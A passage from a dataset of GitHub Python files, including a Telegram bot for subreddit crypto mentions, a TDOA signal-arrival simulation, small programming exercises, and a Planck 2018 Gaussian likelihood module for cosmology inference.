ret = \"Data is not ready yet, try again in some minutes\"\n return ret\n \n output = ''\n for index, row in pd_mentions.iterrows():\n output += '{symbol}: {mentions}\\n'.format(symbol=row[0], mentions=row[1])\n\n db.disconnect_db()\n if len(output) == 0:\n ret = \"Data is not ready yet, try again in some minutes\"\n return ret\n return output\n\ndef top_set(context : CallbackContext):\n # text must be passed by keyword here; the first positional argument of\n # send_message is chat_id\n context.bot.send_message(chat_id=context.job.context, text=top(context.args[3], context.args[4]))\n\ndef top_one(update : Update, context : CallbackContext):\n if len(context.args) != 2:\n update.message.reply_text(\"Only two parameters should be passed\")\n return\n update.message.reply_text(top(context.args[0], context.args[1]))\n\ndef remove_job_if_exists(update, context) -> bool:\n \"\"\"Remove all scheduled jobs. Returns whether a job was removed.\"\"\"\n current_jobs = context.job_queue.jobs()\n if not current_jobs:\n return False\n for job in current_jobs:\n job.schedule_removal()\n return True\n\ndef stupid_hello(context):\n '''Debugging'''\n job = context.job\n context.bot.send_message(chat_id=job.context, text='Hello World')\n\n\n# Define a few command handlers. These usually take the two arguments update and\n# context. 
Error handlers also receive the raised TelegramError object in error.\ndef set_timer(update: Update, context: CallbackContext):\n \"\"\"Send a message when the command /set_timer is issued, order of args: interval, start, finish, top_num, sub.\"\"\"\n if len(context.args) != 5:\n update.message.reply_text('You need to provide 5 arguments: interval, start_hour, finish_hour, top_num, Subreddit')\n update.message.reply_text('For example: /set_timer 30 9 22 10 SatoshiStreetBets')\n update.message.reply_text('Would call the bot every 30 minutes, from 9 to 22 hours, to give you a top_ten from SatoshiStreetBets')\n return\n interval = int(context.args[0])\n start = int(context.args[1])\n finish = int(context.args[2])\n top_num = int(context.args[3])\n sub = context.args[4]\n \n for i in range(3):\n if int(context.args[i]) <= 0:\n update.message.reply_text('We do not support going back in time, yet')\n update.message.reply_text('Try with positive numbers')\n return\n\n if start == 24:\n start = 0\n \n if start >= finish:\n update.message.reply_text('The starting hour must go before the finish hour: interval start finish')\n update.message.reply_text('If you meant it that way... not implemented yet')\n return\n\n if not 1 <= interval <= 1440:\n update.message.reply_text('Interval not valid')\n return\n for i in range(1, 3):\n if not 0 <= int(context.args[i]) <= 24:\n update.message.reply_text('Hour not valid, must be 0-24')\n return\n if top_num <= 0 or top_num > 50:\n update.message.reply_text('Top_{} too much, only 0-50 available'.format(top_num))\n return\n\n if sub not in Fomal_subs.subs:\n update.message.reply_text('Sorry we do not support {}, only {} are available at the moment'.format(sub, Fomal_subs.subs))\n return\n\n update.message.reply_text('Hi! setting timer')\n job_removed = remove_job_if_exists(update, context)\n \n now = datetime.datetime.now()\n first = datetime.datetime(year=now.year, month=now.month,\n day=now.day, hour=int(start),\n minute=0, second=0, tzinfo=now.tzinfo)\n last = datetime.datetime(year=now.year, month=now.month,\n day=now.day, hour=int(finish),\n minute=0, second=0, tzinfo=now.tzinfo) \n\n if now.hour >= first.hour:\n update.message.reply_text('Not implemented yet, problems with timezones, start_hour must be later')\n return\n \n # the magic numbers are because I am working around the time zone problem for now\n context.job_queue.run_repeating(top_set, context=context, interval=60*interval,\n first=(3600*(first.hour-now.hour)-60*(now.minute)),\n last=(3600*(last.hour-now.hour)-60*(now.minute)),\n )\n\n text = 'Timer successfully set! from {start} to {finish} every {mins} minutes'.format(start=start, finish=finish, mins=interval)\n if job_removed:\n text += ' Old one was removed.'\n update.message.reply_text(text)\n\ndef start(update, context):\n update.message.reply_text('Hi!')\n\ndef unset(update: Update, context: CallbackContext) -> None:\n \"\"\"Remove the job if the user changed their mind.\"\"\"\n job_removed = remove_job_if_exists(update, context)\n text = 'Timer successfully cancelled!' 
if job_removed else 'You have no active timer'\n update.message.reply_text(text)\n\ndef help(update, context):\n \"\"\"Send a message when the command /help is issued.\"\"\"\n update.message.reply_text('/start, /top, /set_timer, /unset')\n update.message.reply_text('For example: /top 15 SatoshiStreetBets')\n update.message.reply_text(\"\"\"Or /set_timer 30 9 22 10 CryptoCurrency \n for getting every 30 minutes from 9 to 22 top_10 from CryptoCurrency\"\"\")\n\n\n\ndef error(update, context):\n \"\"\"Log Errors caused by Updates.\"\"\"\n logger.warning('Update \"%s\" caused error \"%s\"', update, context.error)\n\n\nclass Fomal_telegram():\n def __init__(self, local=False):\n self.telegram_token = Config.telegram_token\n self.port = Config.port\n self.is_local = local\n\n def connect_telegram(self):\n updater = Updater(self.telegram_token, use_context=True)\n port = os.getenv('PORT', self.port)\n # Get the dispatcher to register handlers\n dp = updater.dispatcher\n # on different commands - answer in Telegram\n dp.add_handler(CommandHandler(\"start\", start))\n dp.add_handler(CommandHandler(\"top\", top_one))\n dp.add_handler(CommandHandler(\"set_timer\", set_timer, pass_job_queue=True))\n dp.add_handler(CommandHandler(\"unset\", unset))\n dp.add_handler(CommandHandler(\"help\", help))\n\n # log all errors\n dp.add_error_handler(error)\n if self.is_local:\n # Start bot for local usage\n updater.start_polling()\n else:\n # Start the Bot\n updater.start_webhook(listen=\"0.0.0.0\",\n port=port,\n url_path=Config.heroku_token,\n webhook_url='https://fomal.herokuapp.com/' + Config.heroku_token)\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n updater.idle()","repo_name":"pattersonq/sentiment-analyzer","sub_path":"libs/fomal_telegram.py","file_name":"fomal_telegram.py","file_ext":"py","file_size_in_byte":7874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24077960247","text":"import matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport numpy as np\nimport sympy as sy\nimport math\nfrom trilateration import Trilateration_3D\nfrom matplotlib.animation import FuncAnimation\nimport TowersAndConstants\n\nfrom TowersAndConstants import *\nfrom PlotFunctions import *\n\n# Annotations, to be updated during animation\nl = rx_square_side * 3.5\nk = 5\ncur_time = ax.text(40, l - 4 * k, k, 't = 0')\ntower_text = []\nfor i in range(number_towers):\n text = ax.text(40, l - 4 * k, -i * k, 'Tower {} received at t = '.format(i))\n tower_text.append(text)\nv_vec = ax.quiver(generatedTransmitterPosition[0] + 1, generatedTransmitterPosition[1],\n generatedTransmitterPosition[2], 1, 0, 0,\n length=10, normalize=False, fc='k', ec='k')\nv_ann = ax.text3D(generatedTransmitterPosition[0] + 4, generatedTransmitterPosition[1] + 4,\n generatedTransmitterPosition[2], 'v = {} m/s'.format(v))\nreceiveTimes_simulation = np.zeros(number_towers)\nn_frames = 120 # 120\nmax_seconds = 1.1 * max(receiveTimes_generatedTransmitterPosition)\nmax_d = 4 * max(receiveTimes_generatedTransmitterPosition)\n\n\ndef init():\n \"\"\"\n Initialize the elements that won't change during the animation.\n \"\"\"\n global tower_text, init_spheres\n # Create the figure and axes, set up your static elements\n plot_towers() # Plot 
towers only once\n    plot_lines()  # Plot lines only once\n\n\ninit_spheres = Spheres(radius=1, x=generatedTransmitterPosition[0],\n                       y=generatedTransmitterPosition[1],\n                       z=generatedTransmitterPosition[2])\ninit_spheres.coordinates()\n\n\ndef TDOAAnimation(i):\n    \"\"\"\n    Get the receive times at each tower.\n    \"\"\"\n    global t_rec, receiveTimes_simulation, tower_text, v_vec, v_ann\n    t = i / n_frames * max_seconds\n    Radius = v * t\n    # ax.collections.clear()\n    v_vec.remove()\n    Spheres.remove_all()\n    v_vec = ax.quiver(generatedTransmitterPosition[0] + Radius, generatedTransmitterPosition[1],\n                      generatedTransmitterPosition[2], 1, 0, 0,\n                      length=10, normalize=True, fc='k', ec='k')\n    v_ann.set_position((generatedTransmitterPosition[0] + 4 + Radius, generatedTransmitterPosition[1] + 4))\n    spheres_generatedTransmitterPosition = Spheres(radius=Radius, x=generatedTransmitterPosition[0],\n                                                   y=generatedTransmitterPosition[1],\n                                                   z=generatedTransmitterPosition[2])\n    spheres_generatedTransmitterPosition.coordinates()\n    cur_time.set_text('t = {:.12E} s'.format(t))\n    for u in range(number_towers):\n        # print('Tower {}: t = {}, receiveTimes[{}] = {}'.format(u, t, u,\n        #                                                        receiveTimes_generatedTransmitterPosition[u]))\n        if t >= receiveTimes_generatedTransmitterPosition[u] and receiveTimes_simulation[u] == 0:\n            receiveTimes_simulation[u] = t\n            tower_text[u].set_text(\n                'Tower {} received at t = {} s'.format(u, receiveTimes_simulation[u]))\n\n\nanimation = FuncAnimation(fig, TDOAAnimation, init_func=init, frames=n_frames, interval=1, blit=False, repeat=False)\nanimation.save('C:/Users/Mem/Desktop/Studium/Vertiefungsmodul/Animationen/TDOA.gif', writer='imagemagick', fps=60)\n# animation.save('/home/mohammed/Animationen/TDOA1.gif', writer='imagemagick', fps=20)\nplt.show()\n\n# define the index of the first Tower that got the signal, default first_tower = 0.\nfirst_tower = int(np.argmin(receiveTimes_simulation))\n\n# Time Difference Of Arrival between each pair of Towers (i, j).\n# Time Difference Of Arrival distances between each pair of Towers. 
Is calculated by multiplying each TDOA with v.\nTDOA_ij = []\nTDOA_distances_ij = []\nfor i in range(number_towers):\n for j in range(i + 1, number_towers):\n tdoa_ij = abs(receiveTimes_simulation[j] - receiveTimes_simulation[i])\n TDOA_ij.append(tdoa_ij)\n TDOA_distances_ij.append(v * tdoa_ij)\nprint(\"receiveTimes_simulation:\", receiveTimes_simulation)\nprint(\"TDOA_i0:\", TDOA_ij)\nprint(\"TDOA_distances_i0:\", TDOA_distances_ij)\n","repo_name":"Mem314/Multilateration","sub_path":"TDOASimulation.py","file_name":"TDOASimulation.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4524382528","text":"\"\"\"\r\nUse uma função built-in para obter a primeira e a última letra da lista letras, considerando a ordem alfabética.\r\n\r\nletras=['c','k','w','x','m','r','j','l','n','v']\r\nResultado esperado:\r\n\r\nPrimeiro letra: c\r\nÚltima letra: x\r\n\"\"\"\r\n\r\nletras = ['c', 'k', 'w', 'x', 'm', 'r', 'j', 'l', 'n', 'v']\r\n\r\nprint(f'Primeira letra: {min(letras)}\\n'\r\n f'Última letra: {max(letras)}')","repo_name":"hhigorb/exercicios_python_pratica","sub_path":"4_Funções/ex030.py","file_name":"ex030.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38165885682","text":"\"\"\"\nproper fraction\n\"\"\"\nfraction = (100/1000)\nprint(fraction)\n\n\"\"\"\nimproper fraction\n\"\"\"\nim_fraction = (1000/100)\nprint(im_fraction)\n\n\"\"\"\nRasel picked (X) mangoes from their trees.\nTotal (Y) members are there in his family.\nNow he will divide these mangoes among all his family members.\n\"\"\"\nX = int(input(\"How many members are there in his family: : \"))\nY = int(input(\"How many mangoes he picked: \"))\nprint(f'Form {Y} part of Mangoes every family members get {X/Y} part.')\nprint(\"This is the proper fractions.\\n\")\n\n\"\"\"\nequivalent fraction.\n\"\"\"\na = int(input(\"Enter the numerator of fractions 1: \"))\nb = int(input(\"Enter the denominator of fractions 1: \"))\nc = int(input(\"Enter the number (x) numerator 'this number must be not zero': \"))\nd = int(input(\"Enter the number (X) denominator 'this number must be not zero': \"))\neq_fraction_1 = (a/b)\neq_fraction_2 = ((a*c)/(b*d))\nif (eq_fraction_1 == eq_fraction_2):\n print(\"This is a equivalent fractions.\")\nelse:\n print(\"This is not a equivalent fractions.\")\n\n\n\n","repo_name":"sushen/mathandmoremath","sub_path":"3. 
Fractions/fractions.py","file_name":"fractions.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18742549689","text":"import os\nimport numpy as np\n\nfrom desilike.likelihoods import BaseGaussianLikelihood\nfrom desilike.jax import numpy as jnp\nfrom desilike import utils\n\n\nconvert_planck2018_params = {'omegabh2': 'omega_b', 'omegach2': 'omega_cdm', 'omegak': 'Omega_k', 'w': 'w0_fld', 'wa': 'wa_fld', 'theta': 'theta_MC_100', 'tau': 'tau_reio', 'mnu': 'm_ncdm', 'logA': 'logA', 'ns': 'n_s', 'nrun': 'alpha_s', 'r': 'r', 'H0': 'H0', 'omegam': 'Omega_m', 'omegal': 'Omega_Lambda', 'rdrag': 'rs_drag', 'zdrag': 'z_drag'}\n\nconvert_planck2018_params.update({'calPlanck': 'A_planck', 'cal0': 'calib_100T', 'cal2': 'calib_217T', 'acib217': 'A_cib_217', 'xi': 'xi_sz_cib',\n                                  'asz143': 'A_sz', 'aksz': 'ksz_norm',\n                                  'kgal100': 'gal545_A_100', 'kgal143': 'gal545_A_143', 'kgal217': 'gal545_A_217', 'kgal143217': 'gal545_A_143_217',\n                                  'galfTE100': 'galf_TE_A_100', 'galfTE100143': 'galf_TE_A_100_143', 'galfTE100217': 'galf_TE_A_100_217',\n                                  'galfTE143': 'galf_TE_A_143', 'galfTE143217': 'galf_TE_A_143_217', 'galfTE217': 'galf_TE_A_217',\n                                  'aps100': 'ps_A_100_100', 'aps143': 'ps_A_143_143', 'aps143217': 'ps_A_143_217', 'aps217': 'ps_A_217_217'})\n\n\ndef planck2018_base_fn(basename, data_dir=None):\n    \"\"\"\n    Return paths to chains and corresponding summary statistics given input base chain name,\n    and data directory ``data_dir``. If ``data_dir`` is ``None``, defaults to path saved in desilike's configuration,\n    as provided by :class:`Installer` if :class:`BasePlanck2018GaussianLikelihood` or :class:`FullGridPlanck2018GaussianLikelihood` have been installed.\n    \"\"\"\n    if data_dir is None:\n        installer_section = 'FullGridPlanck2018GaussianLikelihood'\n        from desilike.install import Installer\n        try:\n            data_dir = Installer()[installer_section]['data_dir']\n        except KeyError:\n            if basename.startswith('base_plik'):\n                installer_section = 'BasePlanck2018GaussianLikelihood'\n                data_dir = Installer()[installer_section]['data_dir']\n            else:\n                raise\n    try:\n        base_dir, obs_dir = basename.split('_plikHM_')\n    except ValueError as exc:\n        raise ValueError('basename {0} is expected to contain \"_plikHM_\"; maybe you forgot to add the model name in front, e.g. base_{0}?'.format(basename)) from exc\n    base_chain_fn = os.path.join(data_dir, base_dir, 'plikHM_' + obs_dir, basename)\n    base_dist_fn = os.path.join(data_dir, base_dir, 'plikHM_' + obs_dir, 'dist', basename)\n    return base_chain_fn, base_dist_fn\n\n\ndef read_planck2018_chain(basename='base_plikHM_TTTEEE_lowl_lowE_lensing', data_dir=None, weights=None, params=None):\n    \"\"\"\n    Read Planck chains, performing basic parameter conversions.\n\n    Parameters\n    ----------\n    basename : str, default='base_plikHM_TTTEEE_lowl_lowE_lensing'\n        Likelihood base name, e.g. 'base_plikHM_TT', 'base_plikHM_TTTEEE', 'base_plikHM_TTTEEE_lowl_lowE_lensing'.\n\n    data_dir : str, Path, default=None\n        Data directory. Defaults to path saved in desilike's configuration,\n        as provided by :class:`Installer` if :class:`BasePlanck2018GaussianLikelihood` or :class:`FullGridPlanck2018GaussianLikelihood` have been installed.\n\n    weights : str, callable, default=None\n        Callable that takes a :class:`Chain` as input and returns weights (float),\n        e.g. ``weights = lambda chain: 1. 
/ np.exp(chain['logposterior'] + 0.5 * chain['chi2_prior'] + 0.5 * chain['chi2_CMB'])``.\n If ``weights`` is 'cmb_only', the lambda function above is used to \"importance unweight\" the non-CMB datasets\n (useful e.g. to get an approximation of the CMB-only posterior for :math:`w_{0}` and :math:`w_{a}` extensions).\n\n params : list, ParameterCollection\n List of parameters to convert the chain to; e.g. ['h', 'Omega_m', 'A_s'].\n\n Returns\n -------\n chain : Chain\n \"\"\"\n from desilike.samples import Chain\n base_chain_fn = planck2018_base_fn(basename, data_dir=data_dir)[0]\n chain = Chain.concatenate(Chain.read_getdist(base_chain_fn))\n\n if weights is not None:\n if isinstance(weights, str):\n\n if weights.lower() == 'cmb_only':\n\n def weights(chain):\n loglikelihood_non_cmb = chain['logposterior'] + 0.5 * chain['chi2_prior'] + 0.5 * chain['chi2_CMB']\n loglikelihood_non_cmb -= np.mean(loglikelihood_non_cmb) # remove zero-lag\n return 1. / np.exp(loglikelihood_non_cmb)\n\n elif not callable(weights):\n raise ValueError('weights should be a callable, found {}'.format(weights))\n\n chain.aweight *= weights(chain)\n\n if params is not None:\n\n for name, newname in convert_planck2018_params.items():\n if name in chain:\n chain[newname] = chain[name]\n\n def get_from_chain(name):\n if name in chain:\n return chain[name]\n if name == 'A_s':\n return 1e-10 * np.exp(get_from_chain('logA'))\n if name in ['ln10^{10}A_s', 'ln10^10A_s', 'ln_A_s_1e10']:\n return get_from_chain('logA')\n if name == 'h':\n return get_from_chain('H0') / 100.\n if name.startswith('omega'):\n return get_from_chain('O' + name[1:]) * get_from_chain('h') ** 2\n if name in ['Omega_b', 'Omega_cdm']:\n return get_from_chain('o' + name[1:]) / get_from_chain('h') ** 2\n\n missing = []\n for param in params:\n name = str(param)\n array = get_from_chain(name)\n if array is None: missing.append(name)\n else: chain[param] = array\n if missing:\n raise ValueError('cannot find parameters {} from chain'.format(missing))\n\n # In case we needed more parameters, we could run desilike's Cosmoprimo in parallel\n return chain\n\n\nclass BasePlanck2018GaussianLikelihood(BaseGaussianLikelihood):\n r\"\"\"\n Gaussian approximation of \"base\" likelihoods of Planck's 2018 data release.\n\n Reference\n ---------\n https://arxiv.org/abs/1807.06209\n\n https://wiki.cosmos.esa.int/planck-legacy-archive/index.php/CMB_spectrum_%26_Likelihood_Code\n\n Parameters\n ----------\n cosmo : BasePrimordialCosmology, default=None\n Cosmology calculator. Defaults to ``Cosmoprimo()``.\n\n data_dir : str, Path, default=None\n Data directory. Defaults to path saved in desilike's configuration,\n as provided by :class:`Installer` if likelihood has been installed.\n\n basename : str, default='base_plikHM_TTTEEE_lowl_lowE_lensing'\n Likelihood base name, e.g. 'base_plikHM_TT', 'base_plikHM_TTTEEE', 'base_plikHM_TTTEEE_lowl_lowE_lensing'.\n\n source : str, default=None\n Source, either:\n\n - 'covmat': use '.margestats' for mean and '.covmat' file as covariance.\n - 'chains': compute mean and covariance from chains\n\n Both options are very close (within precision in provided file).\n Defaults to 'chains' if ``weights`` is not ``None``, else 'covmat'.\n\n weights : str, callable, default=None\n Callable that takes a :class:`Chain` as input and returns weights (float),\n e.g. ``weights = lambda chain: 1. 
/ np.exp(chain['logposterior'] + 0.5 * chain['chi2_prior'] + 0.5 * chain['chi2_CMB'])``.\n If ``weights`` is 'cmb_only', the lambda function above is used to \"importance unweight\" the non-CMB datasets\n (useful e.g. to get an approximation of the CMB-only posterior for :math:`w_{0}` and :math:`w_{a}` extensions).\n Only available if ``source`` is 'chains'.\n \"\"\"\n config_fn = 'planck2018_gaussian.yaml'\n installer_section = 'BasePlanck2018GaussianLikelihood'\n data_file_id = 'COM_CosmoParams_base-plikHM_R3.01.zip'\n\n def initialize(self, cosmo=None, data_dir=None, basename='base_plikHM_TTTEEE_lowl_lowE_lensing', source=None, weights=None):\n self.name = basename\n self.base_chain_fn, self.base_dist_fn = planck2018_base_fn(basename, data_dir=data_dir)\n if cosmo is None:\n from desilike.theories.primordial_cosmology import Cosmoprimo\n cosmo = Cosmoprimo()\n self.cosmo = cosmo\n basenames = ['omegabh2', 'omegach2', 'omegak', 'w', 'wa', 'theta', 'tau', 'mnu', 'logA', 'ns', 'nrun', 'r']\n if source is None:\n source = 'covmat' if weights is None else 'chains'\n if source == 'covmat':\n if weights: raise ValueError('use source = \"chains\" to reweight chains')\n from desilike import LikelihoodFisher\n self.fisher = LikelihoodFisher.read_getdist(self.base_dist_fn, basename=basenames)\n elif source == 'chains':\n chain = read_planck2018_chain(basename=basename, data_dir=data_dir, weights=weights)\n self.fisher = chain.select(basename=basenames).to_fisher()\n else:\n raise ValueError('source must be one of [\"covmat\", \"chains\"]')\n for param in self.fisher.params(): param.update(name=convert_planck2018_params[param.name])\n params = self.fisher.params()\n self.cosmo_quantities = params.basenames()\n super(BasePlanck2018GaussianLikelihood, self).initialize(data=self.fisher.mean(params=params), covariance=self.fisher.covariance(params=params))\n\n @property\n def flattheory(self):\n return jnp.array([self.cosmo[param] for param in self.cosmo_quantities])\n\n @classmethod\n def install(cls, installer):\n try:\n data_dir = installer[cls.installer_section]['data_dir']\n except KeyError:\n data_dir = installer.data_dir(cls.installer_section)\n\n from desilike.install import exists_path, download, extract\n\n if installer.force_reinstall or not exists_path(os.path.join(data_dir, 'base')):\n # Install data\n tar_base, size = cls.data_file_id, None\n if utils.is_sequence(tar_base):\n tar_base, size = cls.data_file_id\n url = 'http://pla.esac.esa.int/pla/aio/product-action?COSMOLOGY.FILE_ID={}'.format(tar_base)\n tar_fn = os.path.join(data_dir, tar_base)\n download(url, tar_fn, size=size)\n extract(tar_fn, data_dir)\n installer.write({cls.installer_section: {'data_dir': data_dir}})\n\n\nclass FullGridPlanck2018GaussianLikelihood(BasePlanck2018GaussianLikelihood):\n r\"\"\"\n Gaussian approximation of the full grid of likelihoods of Planck's 2018 data release.\n\n Reference\n ---------\n https://arxiv.org/abs/1807.06209\n\n https://wiki.cosmos.esa.int/planck-legacy-archive/index.php/CMB_spectrum_%26_Likelihood_Code\n\n Parameters\n ----------\n cosmo : BasePrimordialCosmology, default=None\n Cosmology calculator. Defaults to ``Cosmoprimo()``.\n\n data_dir : str, Path, default=None\n Data directory. Defaults to path saved in desilike's configuration,\n as provided by :class:`Installer` if likelihood has been installed.\n\n basename : str, default='base_plikHM_TTTEEE_lowl_lowE_lensing'\n Likelihood base name, e.g. 
'base_plikHM_TT', 'base_plikHM_TTTEEE', 'base_plikHM_TTTEEE_lowl_lowE_lensing', 'base_mnu_plikHM_TTTEEE_lowl_lowE_lensing'.\n\n    source : str, default='covmat'\n        Source, either:\n\n        - 'covmat': use '.margestats' for mean and '.covmat' file as covariance.\n        - 'chains': compute mean and covariance from chains\n\n        Both options are very close (within precision in provided file).\n    \"\"\"\n    config_fn = 'planck2018_gaussian.yaml'\n    installer_section = 'FullGridPlanck2018GaussianLikelihood'\n    data_file_id = ('COM_CosmoParams_fullGrid_R3.01.zip', 11e9)\n","repo_name":"cosmodesi/desilike","sub_path":"desilike/likelihoods/cmb/planck2018_gaussian.py","file_name":"planck2018_gaussian.py","file_ext":"py","file_size_in_byte":11787,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"42262236571","text":"import json\nimport numpy\nfrom numpy import *\nimport scipy.stats, scipy\nimport pymultinest\nfrom Full_likelihood import *\n\n\ndef Prior(cube, ndim, nparams): \n\n\t#Spectral index. Uniform prior between 2 and 3. \n\tcube[0] = cube[0] + 2\n\n\t#Mass of mediator. Log uniform prior between 10^-5 and 10^2\n\tcube[1] = 10**(cube[1]*7 - 5)\n\n\t#Coupling constant. Log uniform prior between 10^-3 and 1. \n\tcube[2] = 10**(cube[2]*3 - 3)\n\n\t#Expected number of astrophysical neutrinos. Uniform distribution between 0 and 80.\n\tcube[3] = cube[3] * 80 \n\n\t#Expected number of conv. atm. neutrinos. Uniform distribution between 0 and 80.\n\tcube[4] = cube[4] * 80 \n\n\t#Expected number of prompt atm. neutrinos. Uniform distribution between 0 and 80.\n\tcube[5] = cube[5] * 80 \n\n\t#Expected number of atm. muons. Uniform distribution between 0 and 80.\n\tcube[6] = cube[6] * 80 \n\n\treturn 0\n\n\ndef Log_Like(cube, ndim, nparams): \n\n\tgamma = cube[0]\n\tM = cube[1]\n\tg = cube[2]\n\tN_a = cube[3]\n\tN_conv = cube[4]\n\tN_pr = cube[5]\n\tN_mu = cube[6]\n\n\tz_min = 0\n\tz_max = 4\n\tE_min = 3\n\tE_max = 8\n\tE_npts = 5 #200\n\n\tlog10_nu_energy_min = 2.8\n\tlog10_nu_energy_max = 9.2\n\n\tnu_energy_min = 10**log10_nu_energy_min\n\tnu_energy_max = 10**log10_nu_energy_max\n\tnu_energy_num_nodes = 20 #150\n\tcosthz_npts = 2 #50\n\tlog10_energy_dep_int_min = 4\n\tlog10_energy_dep_int_max = 7\n\tlog10_energy_dep_min = 3.8\n\tlog10_energy_dep_max = 7.2\n\tlog10_energy_dep_npts = 10 #50\n\ttime_det_yr = 8\n\tvolume_total = 6.44e14\n\tenergy_nu_max = 1e8\n\tepsabs = 1e-3\n\tepsrel = 1e-3\n\tverbose = 1\n\n\tlikelihood = Full_likelihood(N_a, N_conv, N_pr, N_mu, g, M, z_min, z_max, E_min, E_max, E_npts, gamma, nu_energy_min, nu_energy_max, nu_energy_num_nodes, \n\t\t\t\t\t\t\t\tcosthz_npts, log10_energy_dep_int_min, log10_energy_dep_int_max, log10_energy_dep_min, log10_energy_dep_max, log10_energy_dep_npts, \n \t\t\t\t\ttime_det_yr, volume_total, energy_nu_max, epsabs, epsrel, verbose)\n\n\t# MultiNest expects the natural logarithm of the likelihood\n\tlog_l = np.log(likelihood)\n\tprint('Log_l=',log_l)\n\treturn log_l\n\n\n\n\nparameters = [\"gamma\", \"M\", \"g\", \"N_a\", \"N_conv\", \"N_pr\", \"N_mu\"]\nn_params = len(parameters)\n\n\n\n\n# Run MultiNest\npymultinest.run(Log_Like, Prior, n_params, outputfiles_basename='out/',\n\t\t\t\tresume=True, verbose=True, n_live_points=100, seed=1, \n\t\t\t\tevidence_tolerance=0.1, importance_nested_sampling=True)\n\njson.dump(parameters, open('out/params.json', 'w')) # Save parameter 
names\n\n","repo_name":"mbustama/secret-nu-int","sub_path":"Likelihood/Likelihood_analysis.py","file_name":"Likelihood_analysis.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4939648592","text":"\"\"\"\nLargest palindrome product\n\nA palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 x 99.\n\nFind the largest palindrome made from the product of two 3-digit numbers.\n-------------------------\n\n\"\"\"\n\n# let's first create a function that checks for a given integer if it's a palindrome or not\ndef is_palindrome(number: int):\n    \"\"\"\n    In this function we build the given number backwards by\n    repeatedly taking its last digit and appending it to the\n    reversed result, then compare the given number\n    with the obtained result and tell if it's a palindrome or\n    not.\n    \"\"\"\n    # at the beginning the reverse variable is empty\n    reverse = 0\n    # we keep a copy of the given number because its initial\n    # value will be altered during the while loop\n    original_number = number\n\n    # iteration process\n    while number > 0:\n        reverse = (reverse * 10 + number % 10) # we multiply the previous reverse value\n        # by 10 to keep the previous digit then we add the rightmost digit of the\n        # original number\n        # It's a bit abstract as you see it here but by playing around with the Python\n        # interpreter you will understand the trick better ;)\n        number = number//10 # here we truncate the last digit from the number\n\n    if reverse == original_number: # final statement\n        return True\n    return False\n\n# now we'll use two variables to multiply each 3-digit number by every other 3-digit number\n# and get the product of each operation and test if it's a palindrome or not by using our\n# function, if yes we put it in a list containing every palindrome found.\n\npalindromes = []\n\nfor first_factor in range(100,1000):\n\n    for second_factor in range(100,1000):\n\n        if is_palindrome(first_factor * second_factor): # we test if each product is a palindrome\n            palindromes.append(first_factor * second_factor) # if so we append it to our list\n\nlargest_palindrome = 0 # at first our biggest palindrome is 0, value will increase later\n\n# in this simple for loop we compare each palindrome to get the largest one\nfor palindrome in palindromes:\n    if palindrome > largest_palindrome:\n        largest_palindrome = palindrome\n\n# output the answer\nprint(largest_palindrome)\n","repo_name":"TheWritter/ProjectEuler","sub_path":"problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9553523073","text":"\"\"\"Top-level package for geemap.\"\"\"\n\n__author__ = \"\"\"Qiusheng Wu\"\"\"\n__email__ = \"giswqs@gmail.com\"\n__version__ = \"0.8.11\"\n\n\ndef in_colab_shell():\n    \"\"\"Tests if the code is being executed within Google Colab.\"\"\"\n    import sys\n\n    if \"google.colab\" in sys.modules:\n        return True\n    else:\n        return False\n\n\nif in_colab_shell():\n    from .eefolium import *\nelse:\n    from .geemap import *\n","repo_name":"konradteichert/geemap","sub_path":"geemap/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"43406269362","text":"import os\nimport sys\nimport numpy as np\n\ndef 
read_result(i):\n\tresultat = open(\"Perf/resultat_client_\"+str(i)+\".txt\",\"r\")\n\n\tcontenu = resultat.read()\n\n\tcontenu = contenu.split(\"\\n\")\n\t\n\treturn contenu[len(contenu)-2]\n\t\n\nnb_client = int(sys.argv[1])\nresults = []\n\nfor i in range(nb_client):\n\tresults.append(read_result(i))\n\narray = np.array(results, dtype=\"int\")\n\ntotal = 0\n\nfor i in array:\n\ttotal += i\n\t\n#print(total)\n\t\nval = (total / nb_client )/60\nprint (val)\n","repo_name":"BoubacarKaneTSP/Test","sub_path":"Performance/read_results.py","file_name":"read_results.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2401173664","text":"class Solution:\n def search(self, nums: List[int], target: int) -> int:\n left, right = 0, 0 if nums[0] < nums[-1] else len(nums)-1\n \n while left < right:\n mid = left + int((right-left)/2)\n if nums[0] <= nums[mid]:\n left = mid+1\n else:\n right = mid\n \n if nums[left] <= target <= nums[-1]:\n left, right = left, len(nums)-1\n else:\n left, right = 0, max(0, left-1)\n \n while left <= right:\n mid = int((left+right)/2)\n if target == nums[mid]:\n return mid\n if target < nums[mid]:\n right = mid-1\n else:\n left = mid+1\n \n return -1\n","repo_name":"SouradeepSaha/leetcode","sub_path":"33. Search in Rotated Sorted Array.py","file_name":"33. Search in Rotated Sorted Array.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4916670545","text":"#!/usr/bin/env python2\n\nfrom compute import *\nfrom 